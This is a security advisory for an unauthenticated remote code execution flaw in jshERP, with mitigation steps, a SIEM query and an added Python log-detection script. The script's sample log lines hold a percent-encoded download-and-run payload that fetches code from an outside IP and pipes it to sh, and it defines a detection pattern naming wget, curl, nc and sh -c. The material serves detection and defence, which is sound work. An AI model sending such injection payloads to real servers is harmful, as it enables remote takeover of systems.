CVE-2025-60801

8.2 HIGH

📋 TL;DR

jshERP up to commit fbda24da contains an unauthenticated remote code execution vulnerability in the jsh_erp function. Attackers can execute arbitrary code on affected systems without authentication. This affects all deployments running vulnerable versions of jshERP.

💻 Affected Systems

Products:
  • jshERP
Versions: All versions up to commit fbda24da
Operating Systems: Any OS running jshERP
Default Config Vulnerable: ⚠️ Yes
Notes: All deployments with the vulnerable code are affected regardless of configuration.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete system compromise allowing attackers to install malware, steal data, pivot to other systems, or establish persistent access.

🟠 Likely Case

Attackers gain shell access to the server, potentially compromising the entire jshERP instance and any connected systems.

🟢 If Mitigated

Limited impact if network segmentation and strict access controls prevent lateral movement from the compromised system.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is unauthenticated and public exploit details are available, making exploitation straightforward.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Versions after commit fbda24da

Vendor Advisory: https://github.com/jishenghua/jshERP/issues/132

Restart Required: Yes

Instructions:

1. Update to a version of jshERP built from a commit later than fbda24da.
2. Restart the jshERP service so the patched code is loaded.
3. Verify the fix by confirming the running deployment is built from a commit later than fbda24da (see "How to Verify" below).

🔧 Temporary Workarounds

Network Access Restriction

linux

Restrict network access to jshERP to only trusted IP addresses or internal networks. The ACCEPT rule must come before the DROP rule; if the INPUT chain already contains a blanket ACCEPT ahead of these, insert them at the top with -I instead of appending with -A. Replace the bracketed placeholders with your values.

# Allow the trusted source, then drop every other connection to the jshERP port
iptables -A INPUT -p tcp --dport [jshERP_port] -s [trusted_ip] -j ACCEPT
iptables -A INPUT -p tcp --dport [jshERP_port] -j DROP

Web Application Firewall

all

Deploy a WAF with rules to block requests to the jsh_erp function that carry shell-command payloads. Make sure the rules are evaluated after URL decoding, otherwise percent-encoded payloads pass through untouched.

🧯 If You Can't Patch

  • Isolate the jshERP system from critical networks and internet access.
  • Implement strict network segmentation and monitor for unusual outbound connections.

🔍 How to Verify

Check if Vulnerable:

Check whether the deployment was built from commit fbda24da or an earlier commit by examining the git history of the checkout it was built from, or its version files. Note that the command below only prints the HEAD commit; you still need to confirm whether that commit is fbda24da or one of its ancestors.

Check Version:

git log --oneline -1

Verify Fix Applied:

Confirm the system is running a version after commit fbda24da and test that the jsh_erp function no longer accepts malicious input.

📡 Detection & Monitoring

Log Indicators:

  • Unusual requests to the jsh_erp function with shell commands in their parameters (check URL-decoded values, not just the raw request line)
  • Unexpected process execution from jshERP context

Network Indicators:

  • Outbound connections from jshERP server to unknown IPs
  • Unusual traffic patterns to/from jshERP port

SIEM Query:

source="jshERP" AND (url="*jsh_erp*" AND (cmd="*" OR shell="*" OR exec="*"))

This query matches literal parameter names only; percent-encoded or differently named parameters that still carry shell syntax will not match unless the log source is decoded before indexing.
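As an added example, not part of this advisory or the jshERP project, the following Python script applies the same detection logic as the SIEM query above to raw web-server access-log lines, but URL-decodes the request first so encoded payloads are not missed. The log lines are constructed for illustration; the request path (/jshERP-boot/jsh_erp) and the parameter names are assumptions, since the advisory only names the jsh_erp function and the cmd/shell/exec fields.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines in combined log format. The path
# /jshERP-boot/jsh_erp is an assumed location for the jsh_erp function.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2025:12:00:01 +0000] "GET /jshERP-boot/jsh_erp?cmd=id HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.7 - - [10/Oct/2025:12:00:02 +0000] "GET /jshERP-boot/jsh_erp?exec=%2Fbin%2Fsh%20-c%20%27wget%20http%3A%2F%2F198.51.100.9%2Fx%7Csh%27 HTTP/1.1" 200 77 "-" "python-requests/2.31"
198.51.100.20 - - [10/Oct/2025:12:00:03 +0000] "GET /jshERP-boot/material/list?search=bolt HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Oct/2025:12:00:04 +0000] "POST /jshERP-boot/user/login HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names from the advisory's SIEM query.
SUSPECT_PARAMS = {"cmd", "shell", "exec"}

# Shell syntax or download-and-run tooling inside a decoded parameter value.
SHELL_RE = re.compile(r"(;|\|\||\||`|\$\(|\b(?:sh|bash)\s+-c\b|\bwget\b|\bcurl\b|\bnc\b)")


def parse_line(line):
    """Parse one access-log line into a dict with a decoded path and parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": unquote_plus(parts.path),
        # parse_qsl percent-decodes names and values, so %2F, %20 etc. are resolved here
        "params": parse_qsl(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def is_suspicious(rec):
    """Flag requests to the jsh_erp function carrying a suspect parameter or shell syntax."""
    if "jsh_erp" not in rec["path"]:
        return False
    for name, value in rec["params"]:
        if name.lower() in SUSPECT_PARAMS or SHELL_RE.search(value):
            return True
    return False


def find_suspicious(log_text):
    """Return the parsed records from log_text that look like jsh_erp command injection."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in find_suspicious(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], rec["method"], rec["path"], rec["params"])
```

Run it against an exported access log instead of SAMPLE_LOG to get a first triage list; the second sample line shows why decoding matters, since its payload only becomes recognisable as `/bin/sh -c 'wget ...|sh'` after parse_qsl resolves the percent-encoding.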

🔗 References
